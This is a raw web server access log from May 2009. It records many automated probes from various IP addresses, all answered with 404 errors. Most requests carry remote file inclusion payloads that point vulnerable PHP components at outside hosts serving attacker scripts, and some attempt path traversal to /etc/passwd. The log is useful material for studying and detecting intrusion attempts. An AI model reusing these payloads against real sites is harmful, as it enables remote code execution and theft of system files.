87.106.253.45 - - [08/May/2009:03:43:29 -0400] "GET /logs///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:43:30 -0400] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 209 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:43:30 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.rabika.ru/hk? HTTP/1.0" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:43:30 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.rabika.ru/hk? HTTP/1.0" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
210.68.188.206 - - [08/May/2009:03:43:33 -0400] "GET /logs/errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:43:34 -0400] "GET /errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:43:34 -0400] "GET /logs/error_log.Q108061400/errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.89.31.105 - - [08/May/2009:03:43:41 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
85.214.72.235 - - [08/May/2009:03:43:49 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.214.72.235 - - [08/May/2009:03:43:49 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.214.72.235 - - [08/May/2009:03:43:49 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.150.79.146 - - [08/May/2009:03:44:00 -0400] "GET //includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [08/May/2009:03:44:00 -0400] "GET /logs/access_log.Q108090900//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.79.146 - - [08/May/2009:03:44:00 -0400] "GET /logs//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:44:16 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.204.25.53 - - [08/May/2009:03:44:18 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
77.221.130.6 - - [08/May/2009:03:44:43 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:44:43 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:44:43 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.94.239.16 - - [08/May/2009:03:44:49 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.94.239.16 - - [08/May/2009:03:44:49 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:03:44:49 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
81.94.239.16 - - [08/May/2009:03:44:51 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:45:01 -0400] "GET /logs/access_log.Q108112400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:45:09 -0400] "GET /logs/error_log.Q108080900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.54.141 - - [08/May/2009:03:45:24 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 249 "-" "Microsoft Pocket Internet Explorer/0.6"
218.38.54.141 - - [08/May/2009:03:45:25 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 254 "-" "Microsoft Pocket Internet Explorer/0.6"
86.54.102.45 - - [08/May/2009:03:46:12 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:03:46:14 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
74.6.8.112 - - [08/May/2009:03:46:19 -0400] "GET /logs/access_log.Q108070900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.93.90.162 - - [08/May/2009:03:46:24 -0400] "GET /logs/access_log.Q109041500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:03:46:24 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:03:46:24 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
69.93.90.162 - - [08/May/2009:03:46:35 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:03:46:37 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.93.90.162 - - [08/May/2009:03:46:37 -0400] "GET /logs/access_log.Q109041500%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:46:37 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:46:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:46:40 -0400] "GET /logs/access_log.Q109041200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:46:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:46:48 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:46:53 -0400] "GET /logs/access_log.Q108060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:47:06 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:03:47:24 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/May/2009:03:47:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.98 - - [08/May/2009:03:47:59 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:48:22 -0400] "GET /logs/access_log.Q109040300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:48:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:48:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:48:46 -0400] "GET /logs/access_log.Q109041200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:48:55 -0400] "GET /errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:48:55 -0400] "GET /logs/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:48:55 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:48:56 -0400] "GET /logs/access_log.Q108100100/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.29.68.196 - - [08/May/2009:03:48:58 -0400] "GET /logs/access_log.Q108090900%20%20//includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=http://www.maler-kreil.de/files/icon.jpg/1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:49:03 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:49:06 -0400] "GET /logs/access_log.Q109041500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:03:49:06 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:03:49:06 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:03:49:15 -0400] "GET /logs/access_log.Q109041300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:49:33 -0400] "GET /logs/access_log.Q109041500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:03:49:34 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:03:49:34 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
217.199.222.19 - - [08/May/2009:03:49:40 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.199.222.19 - - [08/May/2009:03:49:40 -0400] "GET /logs/access_log.Q108100100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:49:44 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:49:45 -0400] "GET /errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:49:45 -0400] "GET /logs/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:49:45 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:49:45 -0400] "GET /logs/access_log.Q108100100/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:50:26 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:50:57 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:50:57 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:50:57 -0400] "GET /logs/access_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:51:06 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:51:06 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:51:06 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:51:16 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:51:17 -0400] "GET /logs/access_log.Q108102400%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:51:20 -0400] "GET /logs/access_log.Q108100100%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.40.251 - - [08/May/2009:03:51:25 -0400] "GET /logs/error_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:51:27 -0400] "GET /errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:51:27 -0400] "GET /logs/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:51:27 -0400] "GET /logs/access_log.Q108100100/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:51:27 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:51:35 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:51:36 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:51:36 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:51:46 -0400] "GET /logs/access_log.Q108082100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:52:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.32.100.130 - - [08/May/2009:03:53:18 -0400] "GET /logs/access_log.Q108102400%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:53:18 -0400] "GET /logs/access_log.Q108100100%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:53:33 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
211.115.213.66 - - [08/May/2009:03:53:43 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:03:53:43 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:03:53:43 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
122.153.212.195 - - [08/May/2009:03:53:52 -0400] "GET /logs/access_log.Q109020600//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
122.153.212.195 - - [08/May/2009:03:53:55 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
122.153.212.195 - - [08/May/2009:03:53:55 -0400] "GET /logs/access_log.Q109032800//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
122.153.212.195 - - [08/May/2009:03:53:56 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
122.153.212.195 - - [08/May/2009:03:53:58 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.115.213.66 - - [08/May/2009:03:54:00 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
122.153.212.195 - - [08/May/2009:03:54:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
122.153.212.195 - - [08/May/2009:03:54:03 -0400] "GET /logs/access_log.Q109032800//include/bbs.lib.inc.php?site_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
